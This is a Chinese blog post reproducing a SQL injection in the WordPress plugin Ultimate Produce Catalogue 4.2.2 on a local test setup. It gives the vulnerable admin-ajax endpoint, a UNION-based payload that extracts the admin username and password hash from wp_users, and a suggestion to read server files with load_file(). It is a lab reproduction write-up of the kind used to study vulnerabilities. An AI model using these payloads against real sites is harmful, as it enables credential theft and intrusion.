WordPress插件SQL漏洞复现

该SQL漏洞存在于wordpress的插件Ultimate Produce Catalogue 4.2.2版本,在Exploit Database可以搜到这个漏洞的信息:https://www.exploit-db.com/exploits/42263/。

01.基础环境

1. WordPress _v4.6源码,安装Ultimate Produce Catalogue 4.2.2版本插件。

2. 本机电脑搭建phpstudy作为WEB环境。

02.源码部署

首先wordpress的安装,这个之前在我已经有详细的搭建过程,有不明白的小伙伴可以查看。

下面介绍插件安装,Ultimate Produce Catalogue插件安装包的下载地址:

链接:http://pan.baidu.com/s/1o8Rvdfs

密码:avul

安装完成,启用插件。

03.漏洞复现过程

首先我们使用管理账号新建一个账号,名为testsql,利用testsql这个账号通过sql注入漏洞拿到管理员的账号。

然后使用testsql这个账号进行登陆。

存在漏洞的地址如下:

http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=get_upcp_subcategories

[请求数据]

CatID=0UNION SELECT 1,2

引起这个漏洞的原因是CatID的参数没有做转义处理导致sql注入,如下图,可执行sql语句。

下载之后,进入首页,选择插件,添加插件并安装。

管理员管理员账号和密码的sql语句:

Payload:

CatID=0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1

04.总结

这个漏洞有点鸡肋,首先必须使用存在的账号登陆才能够回显数据,接着获得admin的账号密码之后,密码的破解难度很大,我们可以使用load_file()去读取系统的文件,如下是读取数据库的配置文件。

查看源代码:


最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 注入攻击的分类 1.没有正确过滤转义字符 在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传...
    查无此人asdasd阅读 5,599评论 0 5
  • SQL注入 概念 危害 原理 实例 防御 基础 - ### SQL语句所用符号不同数据库的sql注入与提权常见S...
    yddchsc君阅读 5,174评论 1 10
  • 漏洞挖掘与利用 测试环境的搭建 引言 为什么要搭建本地测试环境?我想下面的东西能够回答你的疑惑。 第二百八十五条 ...
    作业没写完阅读 8,509评论 0 4
  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 10,332评论 0 9
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 135,314评论 19 139